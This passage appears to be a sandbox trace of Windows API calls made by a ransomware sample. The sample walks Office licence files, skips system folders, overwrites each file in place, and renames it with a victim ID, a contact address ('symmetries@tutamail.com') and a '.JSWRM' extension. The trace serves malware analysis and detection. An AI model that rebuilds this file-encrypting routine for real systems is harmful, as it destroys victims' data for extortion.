CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.174] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10651) returned 1 [0106.174] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0106.174] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0106.176] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.176] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0106.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.177] CloseHandle (hObject=0x45c) returned 1 [0106.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0106.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0106.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0106.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.177] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0106.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0106.179] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe76ff4e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe76ff4e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe780a5fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17ac, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteFreeR_Bypass-ppd.xrm-ms", cAlternateFileName="ONDBB0~1.XRM")) returned 1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2=".") returned 1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="..") returned 1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="...") returned 1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="windows") returned -1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.179] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0106.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteFreeR_Bypass-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0106.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteFreeR_Bypass-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.180] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6060) returned 1 [0106.180] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17a0) returned 0x205850 [0106.180] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x17a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x17a0, lpOverlapped=0x0) returned 1 [0106.182] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.182] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x17a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x17a0, lpOverlapped=0x0) returned 1 [0106.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0106.182] CloseHandle (hObject=0x45c) returned 1 [0106.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0106.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0106.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0106.184] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe755bb57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe755bb57, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe76ff4e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2cbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteFreeR_Bypass-ul-oob.xrm-ms", cAlternateFileName="ONENOT~1.XRM")) returned 1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.184] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0106.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0106.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteFreeR_Bypass-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.185] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11455) returned 1 [0106.185] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2cb0) returned 0x24c1d0 [0106.185] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2cb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2cb0, lpOverlapped=0x0) returned 1 [0106.187] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.187] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2cb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2cb0, lpOverlapped=0x0) returned 1 [0106.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.187] CloseHandle (hObject=0x45c) returned 1 [0106.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0106.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0106.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0106.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0106.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0106.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0106.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.189] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7640926, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7640926, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7725736, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x516c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Grace-ppd.xrm-ms", cAlternateFileName="ONEF0F~1.XRM")) returned 1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.189] lstrcmpiW (lpString1="OneNoteR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0106.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0106.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240fc0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0106.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 